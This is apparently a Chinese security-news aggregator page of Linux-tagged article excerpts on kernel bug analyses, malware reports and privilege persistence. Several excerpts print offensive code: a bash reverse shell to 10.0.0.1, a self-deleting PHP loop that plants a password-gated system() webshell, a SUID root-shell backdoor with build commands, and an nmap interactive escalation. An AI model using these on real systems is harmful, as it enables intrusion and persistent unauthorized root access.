记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

​使用AFL和KLEE分析Userland中的Linux内核漏洞

UserLAnd是一款完全免费的Android应用程序,可以快速轻松地安装Linux发行版,而无需任何支持。研究人员最喜欢的发现软件漏洞的技术之一是将安全工具从一个研究领域重新定位或扩展到另一个研究领域。一个很好的例子是将流行的Linux内核模糊器syzkaller 移植到macOS上时,他们发现了macOS内核中的几个漏洞,其中包括两个他们能够利用其执行本地特权升级的漏洞。最近研究人员一直在分析RHEL 7.7内核,为了帮助分析内核,研究人员修改了内核的几个部分以与通常用于Linux用户域漏洞研究的现有工具一起使用。与Linux内核相比,Linux用户态环境提供了广泛的工具来帮助进行漏洞研究。你可以点此文查看一些漏洞研究工具,以及它们研究漏洞的过
发布时间:2020-03-26 11:55 | 阅读:2026 | 评论:0 | 标签:漏洞 linux

Icnanker, a Linux Trojan-Downloader Protected by SHC

Background On August 15, 2019, 360Netlab Threat Detecting System flagged an unknown ELF sample (5790dedae465994d179c63782e51bac1) which generated Elknot Botnet related network traffic. We manually took a look and noticed that it is a Trojan-Downloader which utilizes "SHC (Shell script compiler)" technique and propgrates through weak SSH credentials
发布时间:2020-03-24 01:35 | 阅读:2357 | 评论:0 | 标签:Icnanker SHC Botnet DDoS linux

权限维持及后门持久化技巧总结

一、前言 在攻击者利用漏洞获取到某台机器的控制权限之后,会考虑将该机器作为一个持久化的据点,种植一个具备持久化的后门,从而随时可以连接该被控机器进行深入渗透。本文从Windows持久化,Linux持久化和Web持久化对现有技术进行了总结,对于持久化的攻击形式,主要是靠edr、av等终端产品进行检测。 二、Windows后门 2.1辅助功能镜像劫持 为了使电脑更易于使用和访问,Windows 添加了一些辅助功能。这些功能可以在用户登录之前以组合键启动。根据这个特征,一些恶意软件无需登录到系统,通过远程桌面协议就可以执行恶意代码。 一些常见的辅助功能如: C:WindowsSystem32sethc.exe    粘滞键   
发布时间:2020-03-19 10:50 | 阅读:3265 | 评论:0 | 标签:系统安全 linux windows 后门

linux "io_uring" 提权漏洞(CVE-2019-19241)分析

 “io_uring” 是Linux在5.1版本开始添加的异步IO机制,5.3 版本的内核添加了sendmsg的支持,没有考虑到权限的问题,可能导致权限提升。 前置知识IO_uring 简介io_uring 可以参考这篇文章), 写的很不错, Linux 上的异步IO的实现一直是一个问题,aio和epoll等都存在各种各样的不足,在Linux 5.1 版本中引入了一个新的异步IO框架io_uring主要的代码在下面几个文件fs/io_uring.cfs/io-wq.cfs/io_uring.c添加了三个新的系统调用425 io_uring_setup426 io_uring_enter427 io_uring_regist
发布时间:2020-03-13 18:43 | 阅读:5160 | 评论:0 | 标签:提权 漏洞 linux CVE

Linux下的权限维持

Linux权限维持0X00 关于权限维持什么是权限维持?我们可以直接简单的把权限维持理解为我们在目标上安装了一个后门,权限维持的目的是保证自己的权限不会掉,一直控制住目标.0X01 获得初始权限Linux有很多种反弹shell的方法,反弹shell的好处主要是操作过程中会更加方便,对我个人来说,主要是命令补全,总之,从权限维持的角度来说,可以更好的去执行一些操作.能否反弹shell,要根据目标的环境来尝试,有可能bash无法直接反弹,但是python却可以成功,还要注意白名单问题.实验环境准备直接用Kali,记得做好快照.Bashbash -i >& /dev/tcp/10.0.0.1/8080 0>&1bash
发布时间:2020-03-13 14:17 | 阅读:5180 | 评论:0 | 标签:linux

[ru] CVE-2019-18683: Эксплуатация уязвимости в подсистеме V4L2 ядра Linux

Введение В данной статье описана эксплуатация уязвимости CVE-2019-18683 в ядре Linux, которую я обнаружил и исправил в конце 2019 года. Указанный CVE-идентификатор присвоен нескольким аналогичным ошибкам типа «состояние гонки», которые присутствовали в подсистеме V4L2 ядра Linux на протяжении пяти лет. Пятнадцатого февраля я выступил с докладом по данной те
发布时间:2020-03-12 16:26 | 阅读:4485 | 评论:0 | 标签:linux CVE

windows/linux下php内存马测试

<?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = 'ma_test.php'; $code = '<?php if(md5($_POST["pass"])=="cdd7b7420654eb16c1e1b748d5b7c5b8"){@system($_POST[a]);}?>'; while (1) { file_put_contents($file, $code); //system('touch -m -d "2018-12-01 09:10:12" ma_test.php'); $ntime=date("Y-m-d :h:i:s"); //f
发布时间:2020-03-11 17:36 | 阅读:4473 | 评论:0 | 标签:学习路上 php内存马 内存后门 linux

Linux slub 分配器上的安全加固学习

 linux 内核默认使用slub分配器来做内存管理,在这篇文章里,我们首先简要交代了slub分配器内存分配的基本流程,然后对其上面的两种安全加固做了分析。 slub 分配器简述slub 的实现具体可以参考这篇文章,这里我们简要说明一下。slub 是针对内核的小内存分配,和用户态堆一开始会brk分一大块内存,然后再慢慢切割一样伙伴系统给内存,然后slub分配器把内存切割成特定大小的块,后续的分配就可以用了。具体来说,内核会预先定义一些kmem_cache 结构体,它保存着要如何分割使用内存页的信息,可以通过cat /proc/slabinfo 查看系统当前可用的kmem_cache。内核很多的结构体会频繁的申请和释放内存,用kmem_cache 来管理特定的结构体
发布时间:2020-03-10 15:48 | 阅读:2865 | 评论:0 | 标签:linux 学习

【安全帮】US-CERT发布Linux系统pppd远程代码执行漏洞(CVE-2020-8597)

US-CERT发布Linux系统pppd远程代码执行漏洞(CVE-2020-8597)3月6日,US-CERT发布了一个关于影响PPP daemon(pppd)软件的存在17年之久的远程代码执行漏洞的公告,影响几乎所有基于Linux的操作系统以及网络设备固件。该漏洞为栈缓冲溢出漏洞(CVE-2020-8597),CVSS评分为9.8分;目前pppd官方与部分Linux系统已针对受支持的产品发布了修复该漏洞的安全补丁,请受影响的用户尽快安装进行防护。参考来源:http://blog.nsfocus.net/cve-2020-8597/ 新版《个人信息安全规范》(35273-2020
发布时间:2020-03-08 15:02 | 阅读:10477 | 评论:0 | 标签:漏洞 linux CVE

CVE-2019-18683 linux v4l2 漏洞分析

 CVE-2019-18683是 linux v4l2 子系统上的一个竞争漏洞,潜伏时间长达5年,Alexander Popov在OffensiveCon 2020上披露了漏洞细节。影响vivid驱动,最终造成uaf,有可能可以做本地提权。在这篇文章,我们主要分析漏洞相关代码来找出漏洞的成因。 漏洞分析调试环境搭建v4l2 即video for linux version 2, 是和linux视频相关的子系统,当你在linux上用电脑的摄像头时就会使用到它,对应的驱动是/dev/videoX 。漏洞影响的是 vivid 模块,但是这个模块默认情况下是不会加载的,需要我们手动加载,例如在ubuntu 1804 上可以用下面的命令加载它:可以普通用户也有这个设备的访问
发布时间:2020-03-06 23:26 | 阅读:6795 | 评论:0 | 标签:漏洞 linux CVE

警惕Linux挖矿木马SystemMiner通过SSH爆破入侵攻击

警惕Linux挖矿木马SystemMiner通过SSH爆破入侵攻击2020-03-04 09:12:22近日某企业Linux服务器出现卡慢,CPU占用高等现象,腾讯安全专家通过对故障服务器进行安全检查,发现该服务器遭遇SSH弱密码爆破入侵。一、概述      近日某企业Linux服务器出现卡慢,CPU占用高等现象,向腾讯安全威胁情报中心求助。工程师征得客户同意对该企业网络运行情况进行安全审计。通过对故障服务器进行安全检查,发现该服务器遭遇SSH弱密码爆破入侵。入侵者植入定时任务实现持久化,定时任务下载执行病毒母体INT, INT内置了多个bash命令,会进一步下载执行Linux挖矿木马SystemMiner。此外入侵者还会利用运维工具ansible、knife等
发布时间:2020-03-04 13:18 | 阅读:8509 | 评论:0 | 标签:linux 入侵 攻击

linux下java反序列化通杀回显方法的低配版实现

故事的起因一直觉得shiro反序列化是一个很舒服的洞,payload原生加密(无特征),做项目时有概率遇见并且又是java反序列化洞所以危害又很大。不过尽管这样shiro打起来依然有java反序列化漏洞利用的两个痛点。其一是可用的gadget,其二是带内回显的问题(不出网回显)。不过某天在刷tw的时候发现第二个痛点国内已经有大佬解决了。注意看图,shiro的回显并不在http响应包中而是在http响应包之前,很玄学的回显对吧?联想最近在看了一篇文章通杀漏洞利用回显方法-linux平台,按我的理解这篇文章的思路大致是通过java反序列化执行java代码&&系统命令获取到发起这次请求时对应的服务端socket文件描述符,然后在文
发布时间:2020-03-02 13:22 | 阅读:12939 | 评论:0 | 标签:java linux

Linux 获取 ROOT 权限后的维持小技巧

一个小技巧,做个笔记吧当我们渗透的时候,从低权用户拿到 ROOT 权限了,一旦关闭了 Terminal 窗口 ROOT 权限就没了。为了解决这个问题,我们可以利用 Linux 的 SUID 技巧(人话就是S权限的二进制文件......)代码:```#include int main(){ setuid(0); system("/bin/bash");}```拿到 ROOT 权限之后将上面的代码编译成执行程序```gcc -o rt code.c```然后赋予 S 权限(S权限自己百度)```chmod +s rt```然后愉快的在 ROOT 和非 ROOT 环境来回切换吧 :D
发布时间:2020-02-25 16:07 | 阅读:4829 | 评论:0 | 标签:linux

微软:Linux Defender防病毒软件现已公开预览,下一个是iOS和Android

 微软已经发布了针对Linux的Microsoft Defender高级威胁防护(ATP)防病毒软件的公开预览版。在Microsoft 去年增加了对macOS的支持并将其名称从Windows Defender ATP更改后,新的Defender Linux端点保护在桌面上完善了Microsoft Defender ATP。接下来,Microsoft希望增加对移动设备的支持,将Microsoft Defender引入iOS和Android,并将在本周的RSA Conference上进行预览。微软威胁防护公司副总裁Gindi告诉ZDNet:“我们的目标是在无论是Microsoft还是非Microsoft的所有方面保护现代工作场所环境。我们正在保护Mac上的端点,今天,
发布时间:2020-02-23 15:18 | 阅读:10260 | 评论:0 | 标签:Android iOS linux

谈一谈Linux与suid提取

前几天我在代码审计知识星球里发表了一个介绍nmap利用interactive模式提权的帖子:# 进入nmap的交互模式nmap --interactive# 执行sh,提权成功!sh但具体实施的时候会遇到很多有趣的问题,我们来详细研究一下。suid提权说到这个话题,我们不得不先介绍一下两个东西:suid提权是什么nmap为什么可以使用suid提权通常来说,Linux运行一个程序,是使用当前运行这个程序的用户权限,这当然是合理的。但是有一些程序比较特殊,比如我们常用的ping命令。ping需要发送ICMP报文,而这个操作需要发送Raw Socket。在Linux 2.2引入CAPABILITIES前,使用Raw Socket是需要root权限
发布时间:2020-02-20 12:09 | 阅读:6716 | 评论:0 | 标签:linux

谈一谈Linux与suid提权

前几天我在代码审计知识星球里发表了一个介绍nmap利用interactive模式提权的帖子:# 进入nmap的交互模式nmap --interactive# 执行sh,提权成功!sh但具体实施的时候会遇到很多有趣的问题,我们来详细研究一下。suid提权说到这个话题,我们不得不先介绍一下两个东西:suid提权是什么nmap为什么可以使用suid提权通常来说,Linux运行一个程序,是使用当前运行这个程序的用户权限,这当然是合理的。但是有一些程序比较特殊,比如我们常用的ping命令。ping需要发送ICMP报文,而这个操作需要发送Raw Socket。在Linux 2.2引入CAPABILITIES前,使用Raw Socket是需要root权限的(当然不是说引入CAPABILITIES就不需要权限了
发布时间:2020-02-20 01:14 | 阅读:9416 | 评论:0 | 标签:提权 linux

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云